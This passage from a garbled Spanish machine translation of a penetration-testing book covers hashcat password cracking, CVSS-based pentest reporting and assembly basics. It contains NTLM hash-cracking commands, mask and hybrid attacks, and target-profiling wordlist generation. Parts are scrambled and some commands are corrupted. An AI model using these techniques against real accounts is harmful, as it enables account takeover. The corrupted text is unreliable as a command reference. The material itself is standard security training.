sorprenderá de cuántas formas puede descifrar hashes: Attackmode01(ÿa0): Directo/lista de palabras/diccionario Attackmode02(ÿa1): Combinador Attackmode03(ÿa3): Máscara/fuerza bruta Attackmode04(ÿa6): Híbrido=lista de palabras+máscara Attackmode05(ÿa7): Híbrido=máscara+lista de palabras Modo directo En este modo de ataque, puede usar el archivo del diccionario para hacer el trabajo. Se llama modo directo , pero a menudo lo escuchará llamado ataque de lista de palabras y ataque de diccionario (todos se refieren al mismo) . $hashcat-a0-m[HashType]-o[OutputFilePath][HashesFile Ruta][DiccionarioArchivoRuta] Creación de un archivo de diccionario grande Al principio, tal vez comience con el archivo de diccionario rockyou.txt . Canal de Telegram : @IRFaraExam Machine Translated by Google al menos 15 GB de tamaño. ¿Cómo obtener un archivo de diccionario tan grande? Tendrá que descargar los archivos de diccionario de Internet tanto como pueda, y luego puede combinar todos estos archivos usando la ventana del terminal (suponiendo que todos los archivos están en formato de texto). Primero, descargue todos los archivos en un solo directorio (los descargué en /root/ dics ). Luego, asegúrese de estar dentro del directorio dics y combine todos los archivos en uno solo usando el siguiente comando, asegurándose de que su VM tenga suficiente espacio en disco: root@kali:~/dics#cat*>merged.txt Lo más probable es que el archivo fusionado.txt contenga algunos duplicados. El siguiente paso es clasificar el contenido y eliminar los duplicados mediante los comandos sort y uniq : root@kali:~/dics#sortmerged.txt|uniq>large_dic.txt Cuanto más grande, mejor: large_dic.txt será su amigo en los escenarios de ataques de su diccionario. Verá cómo usarlo más adelante en este capítulo. Reglas del diccionario En un ataque adictivo, puede agregar más opciones de reglas que lo hacen más poderoso. Las reglas se almacenan en una carpeta en el directorio principal de Hashcat. En resumen, las reglas agregarán más combinaciones basadas en el archivo de diccionario que está utilizando con su tarea de craqueo. La gran pregunta es, ¿qué reglas tiene que elegir? Hay muchas reglas tremendas, e incluso para un pentester experimentado, las opciones son abrumadoras. Cuanto más grande es el archivo de reglas, más tiempo lleva, pero más hashes puede descifrar. Probablemente esté diciendo: "Entonces elegiré el archivo de reglas más grande y podré descifrar cualquier hash". Verá cómo descifrar un hash más eficientemente más adelante, pero por el momento, tenga en cuenta las siguientes reglas estándar (aumentando de menor a mayor): Best64Regla regla rockyou-30000 Generado2Regla regla de buceo Aquí hay un ejemplo para descifrar el hash NTLM con un ataque en modo directo y el La mejor opción de regla 64: root@kali:~#hashcat-a0-m1000-o/root/cracked_hashes.txt Canal de Telegram : @IRFaraExam Machine Translated by Google /root/NTLM_hashes.txt/usr/share/wordlists/rockyou.txt-r/usr/share/hashcat/ rules/best64.rule combinador El combinador, como sugiere su nombre, crea combinaciones basadas en varios archivos de diccionario. En el ataque del combinador, deberá especificar dos archivos de diccionario. Este es un ejemplo: root@kali:~#hashcat-a0-m1000-o/root/cracked_hashes.txt/root/NTLM_hashes.txt/ usr/share/wordlists/rockyou.txt/root/mydictionary.txt En el ejemplo anterior, combinamos dos archivos de diccionario: rockyou.txt y probablemente se estos archivos. Usaremos dos estéarchivos preguntando de diccionario cómo el combinador simples para ataca mostrarle mydictionary.txt el proceso:. Dictionary1.txt se une a eliot Clave Prueba Diccionario2.txt 1234 7777 Estos son los resultados del combinador: eliot1234 eliot777 Contraseña1234 Contraseña777 Prueba1234 Prueba777 CombinatorReglas En un ataque combinado, puede agregar reglas mientras realiza el proceso de combinación. Cada regla se aplicará al primer archivo de diccionario (diccionario izquierdo) o al segundo archivo de diccionario (diccionario derecho). Para usar las reglas izquierda o derecha, debe usar las siguientes opciones: ÿj o ÿÿruleÿleft :Regla aplicada al final de cada palabra en el diccionario izquierdo Canal de Telegram : @IRFaraExam Machine Translated by Google ÿk o ÿÿruleÿright : regla aplicada al final de cada palabra en el diccionario correcto Además, tenga en cuenta que deberá incluir un $ en cada carácter que desee agregar. Por ejemplo, ÿj'$ÿ' agregará el carácter de guion a las palabras del primer archivo de diccionario. Según los dos archivos de diccionario anteriores, este es el aspecto que tendrá el comando: root@kali:~#hashcat-a0-m1000-o/root/cracked_hashes.txt/root/NTLM_hashes.txt/root/Dictionary1.txt/root/ Dictionary2.txt- j'$-'-k'$!' La salida de este comando se verá así: Elliot-1234! ¡Elliot-777! ¡Contraseña-1234! ¡Contraseña-777! ¡Prueba-1234! ¡Prueba-777! Maskand Brute - Ataques de fuerza Esta sección cubre lo más importante de todos los modos de ataque en Hashcat. Profundizaremos en cada escenario, pero asegúrese de leer esta sección detenidamente para que pueda comprender fácilmente los conceptos. El ataque de máscara es un ataque inteligente de fuerza bruta. ¿Qué significa eso? En un ataque de fuerza bruta, usted usa todos los caracteres (minúsculas, mayúsculas, números y caracteres especiales). En cambio, en un ataque de máscara, tiene el poder de elegir los tipos de caracteres que desea usar: Minúsculas Mayúsculas dígitos Caracteres especiales Todos los personajes Keyspace El espacio de teclas y los conjuntos de caracteres son dos palabras clave críticas para un ataque de ska. Canal de Telegram : @IRFaraExam Machine Translated by Google el espacio clave es el número total de combinaciones de una máscara o un ataque de fuerza bruta. Esta es la fórmula para un espacio clave en un ataque de fuerza bruta: Keyspace=charsetcount^Longitud Tomemos un ejemplo práctico para entender cómo calcular un espacio clave. Si queremos descifrar la “contraseña 1234” (la longitud es 12), tenemos dos opciones: Podemos intentar romperlo con un ataque de fuerza bruta utilizando caracteres alfanuméricos (va a ser un número mayor si incluye también los caracteres especiales). Keyspace=62(numberoflower+upper+digits)^12(longitudofpassword1234)=3,226,266,762,397,899,821,056 Podemos usar un ataque de aka para apuntar a minúsculas y dígitos solamente. Espacio de teclas = 26 * 26 * 26 * 26 * 26 * 26 * 26 * 26 * 10 * 10 * 10 * 10 = (26 ^ 8) * (10 ^ 4) = 2,088,270,645,760,000 En resumen, el ataque de fuerza bruta es fácil de usar, pero llevará una eternidad ejecutarlo con contraseñas largas (pronto verá cómo usarlo con Hashcat). Máscaras Cuando desee descifrar un hash, comenzará con la longitud de la contraseña. Para usted, la contraseña detrás de la clave es desconocida (incluso el tamaño). Por lo tanto, para comenzar, debe aumentar la longitud cada vez que ejecuta Hashcat. 1. Primera vez: objetivo solo caracteres en minúsculas. 2.Segunda vez: seleccione el primer carácter en mayúsculas y el resto en minúsculas. 3. Por tercera vez: apunte a todos los caracteres, ya sea en minúsculas o en mayúsculas. 4.Cuartavez:añadirdígitosalacombinación. 5.Fifthtime:objetivotodosloscaracteres(inferior+superior+dígitos+especial caracteres). En un ataque amaska, cada carácter desconocido (marcador de posición) puede ser atacado de tres maneras: Variable de conjunto de caracteres personalizado Canal de Telegram : @IRFaraExam Machine Translated by Google Variable de conjunto de caracteres integrado Juego de caracteres estáticos Variables de juego de caracteres incorporadas Con los conjuntos de caracteres incorporados, puede indicar con qué desea representar cada letra. Si desea comenzar a atacar ocho caracteres en minúscula, use el siguiente comando: $hashcat-a3?l?l?l?l?l?l?l?lm[HashType]-o[OutputFilePath] [Ruta del archivo de hashes] El ?l inyectará un carácter en minúsculas, por lo que el espacio clave es el siguiente: aaaaaaaa-zzzzzzzz . Espere un segundo, la máscara anterior ataca solo contraseñas de ocho caracteres. ¿Qué pasa con las series 7, 6, 5, 4, 3, 2, 1? La respuesta es simplemente que agregar la opción de incremento hará el trabajo por usted. $hashcat-a3?l?l?l?l?l?l?l?lm[HashType]--increment-o[OutputFilePath][HashesFilePath] Esta es la lista de conjuntos de chips integrados que utiliza Hashca para descifrar contraseñas usando el Mascarilla: ?l=abcdefghijklmnopqrstuvwxyz ?u=ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d=0123456789 ?s=#$'()*,ÿ./:;<=>?@[\]^_!`{|}+«espacio»"~%& ?a=?l?u?d?s ?h=0123456789abcdef ?H=0123456789ABCDEF ?b=0x00ÿ0xff StaticCharsets Puede usar letras estáticas en lugar de una combinación de caracteres. Por ejemplo, sabe que el nombre de la persona que usa el NTLM tiene su Gedeón, así que, como primer paso, puede incluir algunas combinaciones usando la palabra Gedeón. En el siguiente ejemplo, agregaremos cuatro dígitos a Gideon: Canal de Telegram : @IRFaraExam Machine Translated by Google $hashcat-a3Gideon?d?d?d?d-m1000-o[Ruta del archivo de salida][Ruta del archivo hashes] Si la combinación anterior no funcionara, podríamos aumentar el nivel de complejidad agregando un carácter especial ?S al final: $hashcat-a3Gideon?d?d?d?d?s-m1000-o[Ruta del archivo de salida] [Ruta del archivo de hashes] CustomCharsets En un conjunto de caracteres personalizado, puede inyectar un conjunto personalizado de caracteres en su ataque. Antes de continuar con un ejemplo, tenga en cuenta que primero deberá definir sus conjuntos de caracteres personalizados utilizando las siguientes opciones: ÿ1 o –juego de caracteres personalizado1 ÿ2 o –juego de caracteres personalizado2 ÿ3 o –juego de caracteres personalizado3 ÿ4 o –juego de caracteres personalizado4 Ahora veremos un ejemplo con caracteres de ocho cadenas seguidos de cuatro dígitos. En este escenario, queremos que Hashcat inyecte minúsculas y mayúsculas en el primer carácter, luego el resto de estos siete en minúsculas y, finalmente, agregue los cuatro dígitos: $hashcat-a3-1?l?u?1?l?l?l?l?l?l?l?d?d?d?dm[HashType]-o[OutputFilePath][HashesFilePath] Veamos lo que está haciendo esta fórmula: Primero, usamos el ÿ1?l?u; .Aquí, definimos nuestro juego de caracteres personalizado. Todo lo que necesitamos hacer es inyectarlo en nuestra combinación. Utilice la parte de combinación ?1?l?l?l?l?l?l?l?d?d?d?d; . Tenga en cuenta que el primer carácter ?1 (número 1 y no minúsculas) es donde el juego de caracteres personalizado inyectará caracteres en minúsculas y mayúsculas. Después de eso, inyectamos siete letras minúsculas ?l (esta vez, es la letra y no el número uno). Finalmente, inyectamos los cuatro . dígitos, ?d HashcatCharsetFiles En lugar de adivinar qué combinación de juegos de caracteres usar, Hashca ya lo hizo Canal de Telegram : @IRFaraExam Machine Translated by Google El trabajo para usted y creó una lista de archivos de conjunto de caracteres que puede usar en su viaje de descifrado . $hashcat-a3-m1000-o[Ruta del archivo de salida][Ruta del archivo hashes]/usr/share/ hashcat/masks/rockyou-2-1800.hcmask Ataque de fuerza bruta Si la contraseña es corta (un máximo de nueve caracteres), puede usar la técnica de fuerza bruta basada en el modo de ataque de máscara. $hashcat-a3?a?a?a?a?a?a?a?a--increment-m[HashType]-o[OutputFilePath] [HashesFilePath] Ataques híbridos Un ataque híbrido es similar al ataque combinado, pero en lugar de combinar dos archivos de diccionario, combinamos un archivo de diccionario y un conjunto de caracteres de máscara. En un ataque híbrido, tiene dos opciones: Lista de palabras+máscara: ÿa6 Máscara+lista de palabras: ÿa7 Supongamos que desea agregar un conjunto de caracteres especiales al final de su archivo de diccionario; luego usará el siguiente comando: $hashcat-a6-m[HashType]-o[OutputFilePath][HashesFilePath][DictionaryFilePath]?s Flujo de trabajo de craqueo En este punto, es posible que te sientas confundido y abrumado acerca de qué ataque elegir y por dónde empezar si tienes un desafío de cracking. ¿Deberías usar un archivo de diccionario, fuerza bruta o un ataque de máscara? La respuesta simple son todas, pero necesitarás saber con cuál empezar. Debe comenzar poco a poco y agregar más ataques que consumen más tiempo (los siguientes pasos son solo un ejemplo de cómo puede elevar la complejidad; depende de usted elegir el flujo de trabajo que se adapte a sus necesidades): Canal de Telegram : @IRFaraExam Machine Translated by Google Si puede perfilar su objetivo (una persona o una empresa) y generar un archivo de diccionario adecuado. Orientación a una persona: use cupp.py (descárguelo primero). Apuntando a una empresa: use su sitio web y ejecute el siguiente comando para hacer el trabajo: $cewl[http://sitio web]-w[out_file.txt] Finalmente, use el ataque de diccionario Hashcat (usando el archivo de diccionario que acaba de generar) + la regla Best64. Usa un ataque adictivo usando rockyou.txt + Best64rule. Bruto: forzar los primeros ocho caracteres (si no tiene suficiente potencia de GPU, use siete caracteres como máximo). Use un ataque adictivo con big_dic.txt ( que creó anteriormente) + la regla Best64. Utilice el archivo de máscara rockyouÿ1ÿ60.hcmask . Useahybridattack:Mask( ÿ1?s?d?1?1?1?1 )+wordlist Useahybridattack:wordlist+mask( ÿ1?s?d?1?1?1?1 ). Dictionaryattackusing big_dic.txt +Generated2rule. Ataque combinado: rockyou.txt + rockyou.txt . Utilice el archivo de máscara: rockyouÿ7ÿ2592000.hcmask . A partir de aquí, depende de tu imaginación, pero ¡sabe dónde parar! No te lo tomes como algo personal si no puedes descifrarlo. Resumen Hay mucha información para comprender este capítulo, pero espero que haya aprendido algo nuevo que lo ayude en su carrera (o en su afición). Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 14 Informes Recientemente, Iwashandedapenetrationtestingreportpreparedbyathird partes company.Thiscompanyhiredsomeconsultantstopentestoneofthenewly deployedwebapplicationsintheproductionenvironment.Thereportwasa de copiar y pastefromanothersecurityscanner (por ejemplo, BurpSuite, Nessus, etc.) Reportandfullofmisestimatedseverities.I'mtellingyouthisstorybecauseif informe you'rethebestpenetrationtesterintheworldandyoudon'tknowhowtomakea, thenallyoureffortswillbefornothing.Areportisyourreputation, andit showswhatyourlevelofprofessionalismis. En este capítulo, aprenderá principalmente cómo hacer lo siguiente: Presente informes a sus clientes/empleadores Califique la gravedad de sus hallazgos Descripción general de informes en pruebas de penetración Un informe no se trata solo de la apariencia. Algunas personas piensan que un excelente informe está lleno de palabras. Un buen informe tendrá los siguientes criterios: Puntuación precisa de la gravedad de las vulnerabilidades (sin exagerar la gravedad de una vulnerabilidad) Sin falsos positivos Evidencia (por ejemplo, capturas de pantalla o PoC) y no solo enlaces o definiciones Instrucciones sobre cómo remediar la falla. Aquí es donde brillará un profesional de seguridad. Una definición clara de cómo solucionar el problema es un punto de inflexión en sus informes. (He visto muchos informes donde la parte de remediación es solo un enlace a OWASP, una referencia de CVE, etc.) Seaclaroynodemasiadopalabra Debe dividirse en dos informes: Uninformetécnicoquecomprendetodaslasevidenciasylosdetalles Un informe resumido dirigido a la gerencia (resumen ejecutivo) que Canal de Telegram : @IRFaraExam Machine Translated by Google muestra las vulnerabilidades reales y los resultados de las pruebas de seguridad Bien formateado y conciso para que el lector disfrute leyéndolo. Por lo general, las empresas tienen su propia plantilla para crear informes. No dude en salir de su zona de confort y cambiarla según el estilo de su prueba. PuntuaciónGravedades Comencemos con un ejemplo. Supongamos que durante una prueba de penetración encontró una inyección de SQL usando Burp Suite. De forma predeterminada, la gravedad es Alta para una inyección de SQL y se entusiasmó al encontrar esta falla. quiere demostrar que es el profesional. Pero, profundizando más (más allá del nivel de gravedad), la aplicación probada no contiene información confidencial y solo es accesible desde la intranet (no es visible para Internet). En resumen, varios factores cambiaron el juego, ¿correcto? Common Vulnerability Scoring System, versión 3.1 He estado usando el Common Vulnerability Scoring System (CVSS) durante un tiempo, y la versión actual es 3.1. Tenga en cuenta que esta fórmula siempre está evolucionando, por lo que siempre consulte su sitio web para ver si hay nuevos cambios en www.first.org/cvss/. Entonces, ¿qué es CVSS? Es un sistema de puntuación que considera múltiples factores y calcula la puntuación (por ejemplo, baja, media, alta o crítica) para estimar sus hallazgos de una manera mejor y más precisa. CVSS versión 3.1 utiliza los siguientes factores para calcular la puntuación de una falla/ vulnerabilidad encontrada durante una prueba: Vector de ataque (AV): esta puntuación evalúa que el atacante puede explotar la vulnerabilidad, por ejemplo, de forma remota versus localmente. Red (N): esta opción se selecciona cuando la vulnerabilidad es accesible desde Internet. Adyacente (A): esta opción se selecciona cuando el exploit puede tener éxito en la misma red interna (no accesible desde Internet). Local (L): esta opción se selecciona cuando la pila de red está excluida de las opciones, por ejemplo, abrir un documento (mediante ingeniería social), un registrador de teclas, etc. Canal de Telegram : @IRFaraExam Machine Translated by Google Físico (P): esta opción se selecciona cuando la explotación se realiza físicamente en el host (por ejemplo, el atacante debe ingresar a la sala del servidor). Complejidad de ataque (AC): esta puntuación evalúa la dificultad para explotar una vulnerabilidad. Alto (H): esta opción se selecciona cuando la explotación es difícil de ejecutar. Bajo (L): esta opción se selecciona cuando es fácil explotar la falla. Privilegio requerido (PR): Esta puntuación mencionará el nivel de privilegio necesario para explotar la vulnerabilidad. Ninguno (N): el atacante no necesitará ninguna credencial para acceder a la falla. Bajo (L): El atacante necesitará una cuenta limitada para acceder a la falla. Alto (H): el atacante necesitará una cuenta con privilegios altos para acceder a la falla. Interacción del usuario (IU): esta puntuación evalúa si se requiere o no que un usuario (la víctima) interactúe con la falla (por ejemplo, a través de la ingeniería social). Ninguno(N): La falla se puede explotar sin la interacción de la víctima. Requerido(R): La falla implica algún tipo de interacción con la víctima. Alcance(S): esta métrica evaluará si la falla afectará a otro sistema con un alcance de seguridad diferente. Por ejemplo, si el defecto se explota en el entorno de prueba, entonces permitirá que el atacante explote la red de producción. Sin cambios (U): esta opción se elige cuando los recursos afectados están en el mismo ámbito de seguridad. Cambiado (C): esta opción se selecciona cuando otros activos del ámbito de seguridad se verán afectados por esta falla. Confidencialidad (C): esta métrica evaluará si el atacante podrá leer datos confidenciales. Alto (H): Establezca que si un trabajador puede leer todos los datos confidenciales que una organización tiene en las instalaciones. Bajo (L): establece esto si el atacante puede leer alguna parte de los datos confidenciales que una organización tiene en las instalaciones. Ninguno (N): use esto si el atacante no podrá leer ningún Canal de Telegram : @IRFaraExam Machine Translated by Google Machine Translated by Google Las credenciales SSH del servidor (nombre de usuario: admin; contraseña: admin), pero este host estaba ubicado en un entorno de prueba y solo se usó con fines de prueba (consulte la Figura 14.2). Figura 14.2 Resultados CVSS ¿Se está preguntando cómo esta calculadora evalúa la puntuación crítica, alta, media o baja? La Tabla 14.1 muestra cómo se calcula la puntuación CVSS3.1 . Tabla 14.1 CVSSScoreRating CALIFICACIÓN CVSS3.1 PUNTUACIÓN Ninguna 0 Bajo 0,1–3,9 Medio 4,0–6,9 7,0–8,9 Elevado Crítico 9.0–10.0 InformePresentación Veamos cómo crear un informe profesional basado en ejemplos para que pueda hacer lo mismo por su parte. En general, cuatro entradas están alimentando nuestros informes (utilizo el informe generado por las herramientas para crear y extraer, no a ciegas, la información de mi informe final): Fallos de infraestructura encontrados por un escáner (por ejemplo, OpenVAS, Nessus, Qualys, etc.) o hallazgos manuales Fallos de aplicaciones web encontrados por un escáner (por ejemplo, BurpSuite) o hallazgos manuales Fallos de código fuente encontrados por una herramienta de prueba de seguridad de aplicaciones estáticas (SAST) Canal de Telegram : @IRFaraExam Machine Translated by Google (por ejemplo, Checkmarx, Veracode, etc.) o hallazgos usando una revisión de código manual Defectos de biblioteca de código abierto encontrados por un escáner de biblioteca (p. ej., ciclo de vida de tipo NexusSona) Esta es una estructura de informe que puede usar para crear un informe en su extremo. Generalmente, cada empresa tiene su propio logotipo y plantillas para la apariencia. Portada En esta página, debe mostrar el título de su informe (por ejemplo, "Informe de prueba de penetración" o "Informe de seguridad cibernética"). Asegúrese de incluir los siguientes elementos: Nombre de empresa Nombre del proyecto probado El nombre del responsable (penetration tester; a veces tienes que incluir el nombre de tu empresa, si eres contratado por un tercero) Título del informe HistorialRegistros A veces hay varias personas trabajando en el mismo informe. Además, siempre existe la posibilidad de que el contenido cambie, por lo que un registro histórico ayudará a realizar un seguimiento de los esfuerzos realizados. Unregistrodehistoriadebecontenerlossiguienteselementos: El número de versión Lafechadelcambio El nombre de la persona que lo modificó Una breve descripción de lo que se trata el cambio Resumen del informe Esta sección es la primera parte que resumirá el contenido de las vulnerabilidades encontradas durante sus compromisos. Primero, tómese su tiempo para explicar todas las tareas ejecutadas para realizar el trabajo. Luego, explique la puntuación que usó para evaluar la gravedad de cada falla. Número de leyes en función de su gravedad (los gráficos son agradables de tener) Canal de Telegram : @IRFaraExam Machine Translated by Google Número de categorías y ocurrencias fuera de la ley (por ejemplo, cinco ocurrencias de fallas XSS reflejadas, dos ocurrencias de inyección de SQL, etc.) Sección de Vulnerabilidades Aquí es donde incluirá los detalles sobre cada vulnerabilidad encontrada durante su compromiso. Puede comenzar con las críticas primero y luego incluir las altas, medias y finalmente las bajas. Para cada vulnerabilidad, debe incluir lo siguiente: Una descripción de la falla (el informe generado por el escáner le ayudará a escribir esta sección) Esta puntuación de gravedad basada en CVSS La dirección IP del host o la URL afectada por esta falla Capturas de pantalla o fragmentos de texto sobre cómo explotar la vulnerabilidad (prueba) Finalmente,cómoarreglarlo(laremediación) Resumen Hasta este capítulo, vio la mayoría de las actividades que tendrá que ejecutar como probador de penetración. En este capítulo, aprendió cómo presentar su trabajo como profesional a sus clientes o empleadores (recuerde que el informe que muestra es su imagen profesional). Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 15 Lenguaje de ensamblaje e ingeniería inversa Este capítulo le presentará el concepto de ingeniería inversa utilizando el lenguaje ensamblador. Este puede ser un tema complicado, pero idealmente, a medida que lea este capítulo, el tema no parecerá tan complejo y le resultará divertido aprenderlo. Primero, aprenderá los conceptos básicos del lenguaje ensamblador. A continuación, verá cómo aplicar la ingeniería inversa en la práctica usando los conocimientos que adquirió en la sección de lenguaje ensamblador. En este capítulo, aprenderá sobre lo siguiente: Conceptos básicos del lenguaje ensamblador registros de CPU Instrucciones de montaje Tipos de datos Segmentos de memoria Ingeniería inversa Registros de CPU Probablemente esté emocionado por aprender a usar el lenguaje ensamblador. Este lenguaje no es un lenguaje de programación estándar como Java, Python o .NET. Esta es la mirada más cercana a la CPU y la memoria. En otras palabras, usted está hablando directamente con el jefe, que es la placa base de su computadora. La primera parte que debe comprender son los registros de la CPU. Estos registros se utilizan para almacenar datos temporalmente y manipularlos también. GeneralCPURegistros La figura 15.1 muestra los registros de propósito general que comprenden AX, BX, CX y DX. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 15.1 Registros generales de CPU El primero (AX) es el registro acumulador y se usa para cálculos como suma, resta, división y multiplicación. Para la versión de 64 bits, usamos RAX, y usamos EAX para la versión de 32 bits. En la parte inferior, puede ver las secciones de 8 bits alto y bajo AH y AL. El segundo es el registro base BX y puede usarlo para múltiples propósitos. Luego viene el registro de contador CX; como su nombre lo indica, este registro se utiliza como un contador para bucles e iteraciones. DX es el registro de datos. Hay documentación que lo llama precisión doble, pero el nombre de registro de datos podría ser mejor. Este registro es el hermano de EAX , y trabajan juntos en operaciones temáticas. No se preocupe, no necesita memorizar todas las funcionalidades de cada uno de esos registros, lo más importante que debe saber es que los registros generales se utilizan (como su nombre lo indica) para la manipulación de datos de propósito general. Tenga en cuenta que en este capítulo, nos enfocaremos principalmente en los registros de 32 bits. Más tarde, cuando comencemos a practicar, verá cómo el depurador mostrará EAX, EBX, ECX y EDX. Canal de Telegram : @IRFaraExam Machine Translated by Google ÍndiceRegistros Otro tipo de registro es el registro de índice (consulte la Figura 15.2): el índice de origen (SI) y el índice de destino (DI). Estos registros se utilizan principalmente para la manipulación de cadenas, donde ESI apunta al origen y EDI apunta al destino. Figura 15.2 Registros de índice PunteroRegistros Los registros de punteros son excelentes para usar en la explotación del desbordamiento del búfer (aprenderá más sobre este tema en el siguiente capítulo). Los dos primeros en la parte superior de la Figura 15.3 son el puntero base y el puntero de pila. Estos dos registros se utilizan para operaciones de pila. El puntero de la base apunta a la base de la pila y el puntero de la pila apunta a la parte superior de la pila. El tercer puntero en la parte inferior es el puntero de instrucción, y apunta a la dirección de la siguiente instrucción que el PC debe ejecutar (tenga esto en mente; lo revisaremos durante el Capítulo 16 , “Desbordamiento de búfer/pila”). Registros de segmento El siguiente tipo de registros son los registros de segmento (vea la figura 15.4): código, datos, pila y segmentos adicionales. Rara vez los usará para la explotación, pero dado que esta sección trata sobre los conceptos básicos del lenguaje ensamblador, debe comprender por qué existen. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 15.3 Registros de puntero Figura 15.4 Registros de segmento En resumen, estos registros se utilizan para especificar segmentos en la memoria. En otras palabras, estos registros de segmento almacenan la dirección inicial de un segmento. Esto se debe a que para obtener la ubicación exacta de los datos o instrucciones dentro de un segmento, se requiere un valor de compensación. Canal de Telegram : @IRFaraExam Machine Translated by Google BanderaRegistros Los registros de bandera (consulte la Tabla 15.1) también se denominan registros de control porque la operación de salto se ejecutará en función del valor almacenado en estos registros. Por ejemplo, si los indicadores de cero se restablecen en uno, entonces el JE o el salto son iguales, la instrucción se ejecutará o no se ejecutará si los indicadores de cero son iguales a cero. pronto veremos las instrucciones de JMP, pero es importante entender el rol de estas banderas. Tabla 15.1 Registros de banderas BANDERA ABREVIATURA DESCRIPCIÓN NOMBRE La instrucción aritmética resultante de un Llevar C llevar/tomar prestado. Cuando es siete, entonces el valor es 0. Paridad P Cuando es impar, entonces el valor es 1. Auxiliar A resultado de operación aritmética; acarryfrombit3 intobit4.Cuandoestosucede,elvalorseestablece 1. Cero CON Cuando el resultado es igual a cero, entonces el valor es tabique1. Firmar S Si el signo es positivo, entonces el valor se establece en 0. Si el signo es negativo, entonces el valor se establece en 1. Trampa T dirección D Modo de un solo paso. La cadena de izquierda a derecha; luego, el valor se establece en 0. Cadena de derecha a izquierda, luego el valor se establece en 1. Desbordamiento O Desbordamientodelaofertamásalta. El primero es el indicador de transporte y almacena el contenido de la última parte de un turno. operación. A continuación, el indicador de paridad se establece en 0 si se ajusta a un número par que estamos intentando para comparar o con 1 si el número es impar. por una operación aritmética hace que se lleve de un bit 3 a un bit 4. Luego, el indicador cero se establece en uno cuando los resultados de la comparación son iguales a cero. la bandera se establece en uno cuando el resultado es positivo, y lo contrario sucede cuando es negativo. El indicador Trap es una configuración de operación de un solo paso, por lo que a través del depurador una instrucción a la vez. 0 cuando la operación de cadena es de izquierda a derecha, y se establece en 1 si la cadena Canal de Telegram : @IRFaraExam Machine Translated by Google la operación es de derecha a izquierda. Finalmente, el indicador de desbordamiento indica el desbordamiento del bit más a la izquierda después de una operación aritmética. Ahora que hemos terminado con los registros, pasemos a las instrucciones de montaje. Instrucciones de montaje En lenguaje ensamblador, las instrucciones de ensamblado se verán así: [Dirección][código de operación][instrucción/mnemónico][operandos] Entonces, una instrucción de ensamblaje se compone de su dirección en la memoria a la izquierda, seguida por su valor de código de operación. Luego viene la instrucción para ejecutar (como un MOV o JMP) o cualquiera de los elementos que ve en la Tabla 15.2. Finalmente, tenemos los operandos. A veces tiene dos operandos como en la primera operación MOV en la tabla 15.2. O un operando, como en la operación de inserción que ve en la Tabla 15.2. Echemos un vistazo a las instrucciones más importantes en el montaje (pronto verás un ejemplo práctico sobre una instrucción de montaje, por el momento, céntrate en los principios). Tabla 15.2 Instrucciones de montaje SINTAXIS EJEMPLO MOV<Destino>,<Origen> MOVEAX,ESP Añadir<Destino>,<Origen> ADDESP,0C Sub<Destino>,<Origen> SUBEAX,0A INC<Valor> INCEAX Dec<Valor> DECEAX Empujar<Valor> EMPUJAR POP<Valor> POPEBX LEA<Destino>,<Origen> LEAESP,DWORDPTRSS:[EBPÿA] XOR<Destino>,<Origen> XOREAX,EAX La primera instrucción es MOV, y como su nombre lo indica, mueve un valor desde el origen hasta su destino. En la segunda y tercera líneas, vemos las operaciones de suma y resta, y se usan para cálculos aritméticos. Tenga en cuenta que los resultados de suma y resta se almacenan en el operando de destino. Canal de Telegram : @IRFaraExam Machine Translated by Google ESPitself.Next, theincrementinstructionincrementsthevaluebyone, yla decinstructiondecrementsitbyone.Simple, a la derecha de instrucciones Thencomesthepush, whichpushesavalueonthestack, andthepopinstructionremoves thetopelementfromthestack.Forexample, popEBXremovesthetopitemin thestackandstoresitinEBX.Nextcomesthe “Loadeffectiveaddress” instrucción;? Asyoucanseeintheexample, theaddressoftheValueEBP-AIS copiedintotheESPregister.Belowit, wecanseetheXORoperation; mostof thetime, thisinstructionisusedtoXORthesameoperandtwice.XOREAXand EAXtwicewillresultinazerointheEAXregister ;es lo mismo que MOVzero para EAX. Aún no hemos terminado. Hay algunas instrucciones de montaje adicionales que debe tener en cuenta (consulte la Tabla 15.3). Tabla 15.3 Instrucciones de salto de montaje SINTAXIS DESCRIPCIÓN JMP<Destino> Saltar a una dirección JZ<Destino>|ZF=1 saltarfzero JE<Destino>|ZF=1 Salto igual JNE<Destino>|ZF=0 Saltar si no es igual JNZDestino>|ZF=0 Saltar si no es cero CMP <Op1>, <Op2> Comparar dos operandos TEST<Destino>,<Origen> Testorigenydestino La primera instrucción es la operación de salto, que salta sin condición a una dirección de destino. El siguiente en la lista es el salto si es cero, y salta a una dirección de instrucción si las banderas cero son una. Debajo, el salto, si es igual, también salta si las banderas cero son una. Probablemente se esté preguntando cómo se establecen los indicadores cero, ¿verdad? Bueno, la respuesta está en las dos operaciones inferiores, la comparación y la prueba. La comparación EAX y EBX restará EBX de EAX, y si el resultado es 0, entonces los indicadores cero se restablecerán en 1. La instrucción de prueba realiza una operación Y en los dos operandos; luego, establece los registros de indicadores en consecuencia. Por ejemplo, testEBX dos veces establece el indicador cero en uno. Canal de Telegram : @IRFaraExam Machine Translated by Google La tabla 15.4 muestra la última lista de instrucciones que debe tener en cuenta al usar el lenguaje ensamblador. Tabla 15.4 Instrucciones de montaje SINTAXIS DESCRIPCIÓN CORRECTO Regreso INT<Valor> Interrumpir NOP Sin operaciones CALL<Destino> Callaninstrucción(función) TheFirstOne, RET, isthereturninstruction, anditindicatestheendofthe functioninassembly.Next, theinterruptinstructionsendsasysteminterruptto theprocessortoexecute.Ifyouwanttodevelopassemblyprograms, usethisinstructionalot.Forexample youwill, interrupt80sendsasystemcalltothe kernel.Nowcomesmyfavoriteone, therollercoasterNOPoperation; makesurethatthecodewillexecutebyusingthemagicalNOPslides usethisspecialinstructionwhenweinjectourshellcodebecausewewantto WEWILL (la SiguienteCapítulo) .Finalmente, thecallinstructioncallsafunctionbyspecifyingitsname intheoperandsection. LittleEndian Littleendian es un concepto que veremos en el desbordamiento del búfer (siguiente capítulo). Por el momento, es importante comprender que la arquitectura de la CPU Intel almacena las cosas en orden inverso. Por ejemplo, tome esta instrucción: MOVEAX,2A3B4C5D Tras la ejecución de la instrucción anterior, el valor EAX será 5D4C3B2A (que es el inverso del valor original). Tipos de datos ¿Qué pasa con los tipos de datos en ensamblador? La tabla 15.5 le muestra los más comunes que debe tener en cuenta. Tabla 15.5 